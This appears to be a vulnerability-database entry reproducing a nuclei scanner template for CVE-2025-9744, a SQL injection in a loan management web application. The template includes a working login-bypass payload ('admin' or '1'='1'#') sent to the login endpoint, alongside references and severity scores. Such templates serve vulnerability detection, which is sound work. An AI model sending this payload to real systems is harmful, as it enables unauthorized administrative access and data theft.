Loan Management System 1.0 - SQL Injection

Date: 04 Jul 2026 03:00:48 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com

SQL injection in Loan Management System 1.0 allows data theft, modification, and admin operations.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2025-9744 | 31 Aug 2025 22:44 | circl |
| CNNVD | CampCodes Online Loan Management System security vulnerability | 31 Aug 2025 00:00 | cnnvd |
| CVE | CVE-2025-9744 | 31 Aug 2025 20:02 | cve |
| Cvelist | CVE-2025-9744 Campcodes Online Loan Management System ajax.php sql injection | 31 Aug 2025 20:02 | cvelist |
| GithubExploit | Exploit for Injection in Campcodes Online_Loan_Management_System | 20 Oct 2025 20:48 | githubexploit |
| EUVD | EUVD-2025-26307 | 3 Oct 2025 20:07 | euvd |
| NVD | CVE-2025-9744 | 31 Aug 2025 20:15 | nvd |
| OSV | CVE-2025-9744 | 31 Aug 2025 20:15 | osv |
| Packet Storm | Campcodes Online Loan Management System 1.0 SQL Injection | 21 Oct 2025 00:00 | packetstorm |
| Positive Technologies | PT-2025-35425 | 31 Aug 2025 00:00 | ptsecurity |

id: CVE-2025-9744

info:
  name: Loan Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Unauthenticated attackers can bypass authentication and gain full administrative access through SQL injection in the username parameter, potentially compromising the entire loan management system.
  remediation: |
    Upgrade Loan Management System to a patched version that properly sanitizes user input in authentication handling.
  reference:
    - https://www.exploit-db.com/exploits/50402
    - https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9744
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-9744
    epss-score: 0.01664
    epss-percentile: 0.7386
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,auth-bypass,cms,packetstorm,edb,loancms,sqli,vuln

http:
  - raw:
      - |
        POST /ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
      - |
        GET /index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'window.start_load'
          - 'Welcome back Admin'
          - 'Loan Management System'
        condition: and

      - type: word
        part: body
        words:
          - 'login-form'
        negative: true
# digest: 4a0a0047304502205252fc546e6c9b28c86ae4fabcfe805b4477509ec4a4aad9d4cc6d24c153c94a022100d0bfb6356d003d6d6cce972b2deb7476fe747d26ecfbd613bd48a766b464d97d:922c64590222798bb761d5b6d8e72950

Scores (04 Feb 2026 07:00, current):
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 7.3 - 9.8
CVSS 4: 6.9
CVSS 2: 7.5
CVSS 3: 7.3
EPSS: 0.01664